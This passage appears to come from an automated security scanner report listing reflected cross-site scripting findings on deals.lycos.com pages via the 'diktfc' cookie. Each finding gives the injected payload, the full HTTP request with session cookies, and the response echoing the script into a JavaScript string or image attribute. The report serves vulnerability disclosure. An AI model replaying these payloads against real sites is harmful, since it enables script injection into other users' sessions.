The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c684"%3balert(1)//37756b92c68 was submitted in the diktfc cookie. This input was echoed as 7c684";alert(1)//37756b92c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c684"%3balert(1)//37756b92c68; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c684";alert(1)//37756b92c68"
});
</script>
...[SNIP]...

1.251. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/viore-24-1080p-lcd-hdtv-for-199-414568

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7f1"><script>alert(1)</script>c910f4ec3ad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:20 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad&amp;cj=1" alt="tracker" />
...[SNIP]...

1.252. http://deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/viore-24-1080p-lcd-hdtv-for-199-414568

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fc0a"%3balert(1)//0e43978a264 was submitted in the diktfc cookie. This input was echoed as 1fc0a";alert(1)//0e43978a264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fc0a"%3balert(1)//0e43978a264; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:21 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fc0a";alert(1)//0e43978a264"
});
</script>
...[SNIP]...

1.253. http://deals.lycos.com/deals [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1982"%3balert(1)//13da987201f was submitted in the diktfc cookie. This input was echoed as e1982";alert(1)//13da987201f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae1982"%3balert(1)//13da987201f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae1982";alert(1)//13da987201f"
});
</script>
...[SNIP]...

1.254. http://deals.lycos.com/deals [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05d3"><script>alert(1)</script>ce60a599871 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871&amp;cj=1" alt="tracker" />
...[SNIP]...

1.255. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25659"><script>alert(1)</script>669e5c4d6cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/automotive-238 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/automotive-238&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc&amp;cj=1" alt="tracker" />
...[SNIP]...

1.256. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b2d5"%3balert(1)//27c5d3438ff was submitted in the diktfc cookie. This input was echoed as 5b2d5";alert(1)//27c5d3438ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/automotive-238 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5b2d5"%3balert(1)//27c5d3438ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:59 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/automotive-238",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5b2d5";alert(1)//27c5d3438ff"
});
</script>
...[SNIP]...

1.257. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/babies-and-kids-224

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 930d9"%3balert(1)//408e2508bec was submitted in the diktfc cookie. This input was echoed as 930d9";alert(1)//408e2508bec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/babies-and-kids-224 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A930d9"%3balert(1)//408e2508bec; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/babies-and-kids-224",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A930d9";alert(1)//408e2508bec"
});
</script>
...[SNIP]...

1.258. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/babies-and-kids-224

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74795"><script>alert(1)</script>8fa74226461 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/babies-and-kids-224 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/babies-and-kids-224&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461&amp;cj=1" alt="tracker" />
...[SNIP]...

1.259. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8de9"><script>alert(1)</script>ca62e0e2bb6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/cameras-167 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/cameras-167&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.260. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3d"%3balert(1)//270e9be217c was submitted in the diktfc cookie. This input was echoed as e8b3d";alert(1)//270e9be217c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/cameras-167 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae8b3d"%3balert(1)//270e9be217c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/cameras-167",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae8b3d";alert(1)//270e9be217c"
});
</script>
...[SNIP]...

1.261. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cell-phones-174

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b2e8"%3balert(1)//ec00ddd9290 was submitted in the diktfc cookie. This input was echoed as 2b2e8";alert(1)//ec00ddd9290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

